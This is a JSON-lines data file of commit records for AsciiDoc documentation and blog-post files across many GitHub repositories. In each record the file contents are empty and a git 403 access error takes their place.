{"commit":"b731cb0d9d2bdaa155329bb58fced3822307f7bc","subject":"changes","message":"changes\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"96ec872aa0b05d141a5c7cd48b711c1fedd343e2","subject":"Update 2015-05-01-Post.adoc","message":"Update 2015-05-01-Post.adoc","repos":"pointout\/pointout.github.io,pointout\/pointout.github.io,pointout\/pointout.github.io","old_file":"_posts\/2015-05-01-Post.adoc","new_file":"_posts\/2015-05-01-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pointout\/pointout.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"e461067cef8fb95380c0517824b7803d79bf92bd","subject":"Update 2016-03-23-Test.adoc","message":"Update 2016-03-23-Test.adoc","repos":"scholzi94\/scholzi94.github.io,scholzi94\/scholzi94.github.io,scholzi94\/scholzi94.github.io,scholzi94\/scholzi94.github.io","old_file":"_posts\/2016-03-23-Test.adoc","new_file":"_posts\/2016-03-23-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scholzi94\/scholzi94.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c1465a207376931bbfd6ac2b19feccd3a449e82","subject":"Update 2013-12-16-Eclipse-Tester-Java-8.adoc","message":"Update 2013-12-16-Eclipse-Tester-Java-8.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-12-16-Eclipse-Tester-Java-8.adoc","new_file":"_posts\/2013-12-16-Eclipse-Tester-Java-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85ec14a30f584374c4871152d375b39874ac1c1c","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c1257c57ae7c98eee35ba15f8989c3e1674e1ac","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5dbef326813c5fbe57a57da365bc1d5dcfd1e100","subject":"doc(README): add chinese version","message":"doc(README): add chinese version\n","repos":"dan-blanchard\/blog,dan-blanchard\/blog,dan-blanchard\/blog","old_file":"README-zh.adoc","new_file":"README-zh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dan-blanchard\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c6535b6108b5ed27e56a45d686d8799f40b21b3","subject":"Create CONTRIBUTING.adoc","message":"Create 
CONTRIBUTING.adoc","repos":"matthewtckr\/zendesk-java-client,cloudbees\/zendesk-java-client,norrisjeremy\/zendesk-java-client,christ66\/zendesk-java-client,ydubreuil\/zendesk-java-client,kuisathaverat\/zendesk-java-client,jon-ruckwood\/zendesk-java-client,gvh1234\/zendesk-java-client","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cloudbees\/zendesk-java-client.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b25bef84d426d64756c0f5a972ca350c31ab6fd","subject":"Update 2018-10-15-N-E-M-A-P-I-Docker.adoc","message":"Update 2018-10-15-N-E-M-A-P-I-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-N-E-M-A-P-I-Docker.adoc","new_file":"_posts\/2018-10-15-N-E-M-A-P-I-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5671e87f4d72f15a547a3776fe5b38784e61368","subject":"Minor update","message":"Minor update\n","repos":"dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook","old_file":"packer\/base-centos\/README.adoc","new_file":"packer\/base-centos\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dedickinson\/engineering-notebook.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"683a797994cbf91175c1de6442c7c7ac5ea12a2b","subject":"Azure guide for Quarkus Native applications in Docker containers (#3199)","message":"Azure guide for Quarkus Native applications in Docker containers (#3199)\n\nAdd Azure guide for Quarkus ","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/azure-cloud-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/azure-cloud-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6548c024d84f9042e174144be455eeaa623f1498","subject":"Update data_sets.adoc","message":"Update data_sets.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/data_sets.adoc","new_file":"docs\/data_sets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d9d6aecff686af25ad897f7357243111223db3d","subject":"Fix license badge","message":"Fix license badge\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested 
URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bb299f6dd929ffb06e38f9939de3ac92424756e","subject":"Update 2017-07-18-Makes-You-Winder.adoc","message":"Update 2017-07-18-Makes-You-Winder.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-07-18-Makes-You-Winder.adoc","new_file":"_posts\/2017-07-18-Makes-You-Winder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d721b84b9fdd920891f65e30a3c4af99376c7ae2","subject":"Add documentation","message":"Add documentation\n","repos":"cescoffier\/vertx-forge-addon,cescoffier\/vertx-forge-addon,cescoffier\/vertx-forge-addon","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cescoffier\/vertx-forge-addon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2930f8f7be027b2289d539a823af235099c5934","subject":"Add README in AsciiDoc","message":"Add README in AsciiDoc\n","repos":"myokoym\/play-with-tmlib.js","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/myokoym\/play-with-tmlib.js.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ca85d40c20d9d60fcb352ec17415ad881f6cb85","subject":"y2b create post JBL Flip Unboxing \\u0026 Test (Wireless Bluetooth Speaker)","message":"y2b create post JBL Flip Unboxing \\u0026 Test (Wireless Bluetooth Speaker)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-22-JBL-Flip-Unboxing-u0026-Test-Wireless-Bluetooth-Speaker.adoc","new_file":"_posts\/2012-11-22-JBL-Flip-Unboxing-u0026-Test-Wireless-Bluetooth-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95d672b69ddc2653c528e24ac66e54471cd3f3f9","subject":"y2b create post Giant Multi-Touch Production Surface! (Emulator - Smithson Martin)","message":"y2b create post Giant Multi-Touch Production Surface! (Emulator - Smithson Martin)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-03-Giant-MultiTouch-Production-Surface-Emulator--Smithson-Martin.adoc","new_file":"_posts\/2014-01-03-Giant-MultiTouch-Production-Surface-Emulator--Smithson-Martin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5b87768ff4cfc0df3eefa3bc34b0afc9f7e4bbf","subject":"Next about try. ","message":"Next about try. 
","repos":"rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io","old_file":"about\/about.adoc","new_file":"about\/about.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rage5474\/rage5474.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ee53ca12ec25c601bdbcd31554ed65f04c948df","subject":"Update 2017-05-20.adoc","message":"Update 2017-05-20.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-05-20.adoc","new_file":"_posts\/2017-05-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1159f7bfa43359389f5168a69565d7937123ea54","subject":"[DOCS] Fix update snapshot API description (elastic\/x-pack-elasticsearch#2089)","message":"[DOCS] Fix update snapshot API description (elastic\/x-pack-elasticsearch#2089)\n\nOriginal commit: elastic\/x-pack-elasticsearch@3d98bfad3fd957dfdd912de4679148557250a535\n","repos":"nknize\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch","old_file":"docs\/en\/rest-api\/ml\/update-snapshot.asciidoc","new_file":"docs\/en\/rest-api\/ml\/update-snapshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e3c49e4c1827f07d57f8d0ce44762d44d02c0903","subject":"Moving compile and flash STMboard wiki to be a guide","message":"Moving compile and flash STMboard wiki to be a guide\n","repos":"UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources","old_file":"Compile-and-Flash-STMBoard-Guide\/README.adoc","new_file":"Compile-and-Flash-STMBoard-Guide\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Recruit-Resources.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} 
{"commit":"6619a86249f62d0712072f5a0a51ec90615528e7","subject":"y2b create post iPad Air Unboxing + First Impressions [Launch Day Unboxing]","message":"y2b create post iPad Air Unboxing + First Impressions [Launch Day Unboxing]","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-11-01-iPad-Air-Unboxing--First-Impressions-Launch-Day-Unboxing.adoc","new_file":"_posts\/2013-11-01-iPad-Air-Unboxing--First-Impressions-Launch-Day-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c97813f8495ad1b57cd51eee1a6640ee2eddcf8","subject":"Initial upload of captain's_log.asciidoc","message":"Initial upload of captain's_log.asciidoc\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a10829a34aa0478480018905bf2bbca7feab6589","subject":"y2b create post \u53ea\u5229\u7528 Android Pay \u5ea6\u904e24\u5c0f\u6642","message":"y2b create post \u53ea\u5229\u7528 Android Pay \u5ea6\u904e24\u5c0f\u6642","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-08--Android-Pay-24.adoc","new_file":"_posts\/2016-10-08--Android-Pay-24.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21fa2d91cd9f1088388aec14fedd273d4d19af31","subject":"Delete 2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","message":"Delete 2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","new_file":"_posts\/2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f480a84ec84d63d494807e8a2b05741eec896b4c","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efca6cd0fa6032bdcdfc2904021a9508bfe41cd8","subject":"y2b create post The Mind Blowing 33 Million Pixel Display...","message":"y2b create post The Mind Blowing 33 Million Pixel 
Display...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-26-TheMindBlowing33MillionPixelDisplay.adoc","new_file":"_posts\/2018-01-26-TheMindBlowing33MillionPixelDisplay.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5d5e5ff0743019ac7d0463922ac977b5429e569","subject":"Updated MacOS keychain database file format documentation (#9)","message":"Updated MacOS keychain database file format documentation (#9)\n\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/MacOS keychain database file format.asciidoc","new_file":"documentation\/MacOS keychain database file format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"13be0360a50e55bf5051fb5036803432a07ca1ea","subject":"Update 2016-10-15-Teste-3.adoc","message":"Update 2016-10-15-Teste-3.adoc","repos":"diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io","old_file":"_posts\/2016-10-15-Teste-3.adoc","new_file":"_posts\/2016-10-15-Teste-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diogoan\/diogoan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b74eea1bf32e5a0b5756540f7fc9cb4d0f321d92","subject":"Update 2018-01-20-Bitrise.adoc","message":"Update 2018-01-20-Bitrise.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-20-Bitrise.adoc","new_file":"_posts\/2018-01-20-Bitrise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96ca5153c472e9094084887cb68465ef36374496","subject":"Update 2018-03-15-try-ecr.adoc","message":"Update 2018-03-15-try-ecr.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-15-try-ecr.adoc","new_file":"_posts\/2018-03-15-try-ecr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccd5bd1b0a98f476d683241c0d9bdb16a5cf57a6","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29b285664d31d5406f389337f67e6260d3a9f35a","subject":"KUDU-1139 Point to two Kudu source files which show M\/R integration","message":"KUDU-1139 Point to two Kudu source files which show M\/R integration\n\nThis is a first pass, and will hopefully be superseded by Ted's work on KUDU-983\n\nChange-Id: Iff915475340e9fcbe4bb16609706c4c1ac333533\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/8288\nTested-by: jenkins\nReviewed-by: Misty Stanley-Jones <266ae30cabf4e046de6d26e3d43b9d21b534ee4c@cloudera.com>\n","repos":"EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu","old_file":"docs\/developing.adoc","new_file":"docs\/developing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0241598da28521b06b3d438b3960f80dd2195c8f","subject":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","message":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09125730dcb1deaa637aba161558069c72344d5c","subject":"Create tutorial.adoc","message":"Create tutorial.adoc\n\nAdding the full full tutorial on NLP-based analysis of literary texts using the DDW.","repos":"stefanpernes\/DARIAH-DKPro-Wrapper","old_file":"doc\/tutorial.adoc","new_file":"doc\/tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stefanpernes\/DARIAH-DKPro-Wrapper.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"91632d3789c4dadcfbd779854a7e64cb88432111","subject":"y2b create post The Smartphone For Superheroes...","message":"y2b create post The Smartphone For Superheroes...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-02-The-Smartphone-For-Superheroes.adoc","new_file":"_posts\/2017-12-02-The-Smartphone-For-Superheroes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable 
to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47ac6b3e3fabf52ef4e4cafa8f19819b7305f675","subject":"Fix broken Google C++ Style Guide link","message":"Fix broken Google C++ Style Guide link\n\nChange-Id: Ieb98122b9b086c34c7d8e5fa95c73a914b173f56\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3075\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\nTested-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f4fa10ffe88683ffb485dcc631db11bc3ada92a4","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0434660175ddd65cf3496913abb87f3a8a9d419c","subject":"Update 2015-10-31-The-Lost-Days.adoc","message":"Update 2015-10-31-The-Lost-Days.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-31-The-Lost-Days.adoc","new_file":"_posts\/2015-10-31-The-Lost-Days.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ded665871f05b83ef6217eba36b4595fdd23b54","subject":"adding link to #344","message":"adding link to #344\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3347606d47ec0d15418029061c2d7d78ed878da0","subject":"Update 2015-09-23-Daisies-arent-roses.adoc","message":"Update 
2015-09-23-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3081d3fc4862d59dbafb314cc2a90ebda427d21","subject":"Publish 2016-7-2-easywechat.adoc","message":"Publish 2016-7-2-easywechat.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-easywechat.adoc","new_file":"2016-7-2-easywechat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 